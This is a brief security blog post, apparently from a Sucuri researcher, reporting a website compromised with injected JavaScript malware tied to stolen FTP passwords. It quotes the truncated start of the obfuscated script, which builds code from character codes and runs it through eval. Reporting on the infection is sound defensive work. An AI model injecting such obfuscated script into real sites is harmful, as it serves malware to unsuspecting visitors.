Hacked (Javascript Malware)

It looks like the website is currently hacked and compromised with a JavaScript malware (and serving malware to anyone visiting it).

Our scanner identified the malware as mwjs159 which is often related to stolen FTP passwords. So it looks like one of their developers got their desktop compromised and had his password stolen. From our scanner:

So the compromised file was and we recommend that you do not visit the site right now. We will post more details as we learn more about it…

(Seems that fixed it already)Try view-source: if you want to see the malicious code on the site. It starts as:

String.fromCharCode;};Object.prototype.asd="e";var s="";try{{}["qwtqwt"]
();}catch(q){if(q)r=1;}if(r&&+new Object(1231)&&document.createTextNode("123")
.data&&typeof{}.asd.vfr===’undefined’)n=2;e=eval;m=[18/n,18/n,210/n,204/n,64/n,80/n,200/n, 222/n, 198/n, 234/n, 218/n, 202/n, 220/n, 232/n, 92/n, 206/n, 202/n,232/n, …

Update: It seems that fixed it already.

About David Dede

David Dede is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Share This